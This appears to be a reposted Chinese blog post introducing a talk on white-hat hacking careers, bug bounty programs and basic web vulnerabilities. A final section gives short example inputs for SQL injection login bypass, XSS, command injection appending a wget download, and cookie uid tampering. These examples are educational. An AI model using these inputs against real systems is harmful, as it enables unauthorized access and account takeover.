如何成为白帽黑客
這次我要講的是如何成為白帽黑客。
有很多事情可以使一個人發狂,尤其是缺乏學習所需的堅決與目標感,所以我會先講磚為什么搬為什么不搬,是沾滿民脂的紅磚更適合搬還是混凝土小型空心的砌磚。
?
工欲善其事必先利其器,這是大家經常能看見的一句話。在當今互聯網下,想要更好地撂倒對手,我們需要更可怕的武器「一口箱子」,箱子里的武器不見可以組成任何一件兵器,用來對敵,但更重要的還是提著箱子的你。
我知道國內外都有十四五歲的小白帽通過「漏洞獎勵計劃」獲得過數萬獎金,但獎金不是最重要的,最重要的是,這種實踐方式可以讓我們更快地找到自己的方式,或者說找到自己。每個人的性格天賦又都是獨一無二的,因此找到真實的自己就等于找到了用的人最少的「 Hack mind 」。
關于我
我是長短短,目前在 PKAV Team 主導分布式漏洞掃描器的開發,從事了 5 年的 Web 安全研究,接觸網絡安全已經快十年了,為《 HTML5 規范》做過一些貢獻,對瀏覽器及 Web 前端安全有深入的研究 ,獲得過 Google / Adobe / Apple 的「安全更新致謝」,《 HTML5 Security Cheatsheet 》的編寫人之一, 發布過目前世界最強大的 XSS 攻擊技術思維腦圖(?https://git.io/vPpcM?) ,當然也懂點滲透。
這次 Live 主要包括下面這些問題:
1、如何選擇適合自己的白帽技能學習路線?
1.1:互聯網安全
1.2:移動安全:
1.3:物聯網安全
1.4:客戶端安全
2、如何讓自己的 Skill 更匹配安全方向工作?
2.1:安全開發
2.2:安全運維工程師
2.3:安全工程師
3、如何打造屬于自己的「一口箱子」?
3.1:滲透測試
3.2:漏洞挖掘
3.3:大數據安全
4、如何利用互聯網廠商「漏洞獎勵計劃」邊學習邊賺錢?
4.1:如何選擇靠譜的廠商/平臺
4.2:如何選擇相匹配的目標
4.3:如何與廠商/平臺NPC有效溝通
4.4:如何提交漏洞更容易被認同
我的 Live,你不喜歡,答卷再說:
試 卷
姓名________ 學號________
首先我們來看這個,試卷的名字和編號填寫,這個部分有“漏洞”嗎?
有
學生的姓名和編號都寫在這兒,沒有做任何保護措施,因此,你只要偷看了某人的試卷上的這部分內容,然后把你的試卷的上的姓名和考生編碼寫成和他一樣的即可偽裝出他的身份。
漏洞攻擊成功
一、詩歌補寫
1 床前沒月光,___________。
2 春眠不覺曉,___________。
這道題有漏洞嗎?
有
這道題的答案本來應該是“疑似地上霜”和“處處聞啼鳥”
But,問題中,并沒有規定答案里不能添加標點符號,所以,我完全可以把“疑是地上霜,舉頭望明月,低頭思故鄉”以及“處處聞啼鳥,夜來風雨聲,花落知多少”當做答案寫進去。
漏洞再次進攻成功 :P
二、數學運算(在括號內填入數字)
3 500 + 400 * 3 / 2 + 1 = ( )
4 ( 1 + 2 ) / 3 * 400 +500 = ( )
這個問題有漏洞嗎?
有
出題者規定了只能填入數字,但卻沒有說是什么數字,也沒有規定多少位,那么我的答案可以是 中文數字「壹佰壹拾圓」、羅馬數字「MCI」或「0000000000001101」。
漏洞第三次進攻成功 :D
三、技術實踐
我們打開一個網頁提交登錄或者是搜索都會經過服務器做一系列的處理又回到瀏覽器,在這個過程中我們提交的數據會被帶入到一系列的填空題中,有的是我們能猜到的,有的是意想不到的,有的會經過SQL進行查詢進行填空,有的會被帶入到命令行中進行填空,最后又把結果返回給瀏覽器進行填空,也最后就是我們到的結果了。
- 用戶登錄 SQL 注入填空 - Q:select * from username = ____ and password=_____
- A:select * from username = "test" or ""="" and password="123456"
- 解釋:所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。
 
- 用戶名 XSS 注入填空 - Q:<p style='color:red'>你好啊,尊敬的______<p>
- A:<p style='color:red'>你好啊,尊敬的?xxx<script>alert(1)</script><p>
- 解釋:攻擊者往Web頁面里插入惡意Script代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的Script代碼會被執行,從而達到惡意攻擊用戶的目的。
 
- 遠程命令注入填空 - Q:ping _______
- A:ping?www.baidu.com?& wget xxxxxxxxxxx
- 解釋:用戶通過瀏覽器提交執行命令,由于服務器端沒有針對執行函數做過濾,導致執行命令。
 
- Cookie 身份越權測試 - Cookie: uid=11426;
- Cookie: uid=1;
- 解釋:越權漏洞是比較常見的漏洞類型,可以理解為,一個正常的用戶A通常只能夠對自己的一些信息進行增刪改查,但是由于程序員的一時疏忽未對信息進行增刪改查的時候沒有進行一個判斷,判斷所需要操作的信息是否屬于對應的用戶,可以導致用戶A可以操作其他人的信息。
 
了解了這幾個漏洞之后我們可以看到原理都類似,也很簡單,當然我們不再局限于概念名詞就會發現 web?安全的大部分漏洞都很簡單。更多時候,發現一個復雜的漏洞需要是只是耐心。
轉自?安全盒子
轉載于:https://www.cnblogs.com/lichina/p/6232114.html
總結
 
                            
                        - 上一篇: 农村集体资产产权改革试点将全面展开
- 下一篇: 【LeetCode】马三来刷题之Vali
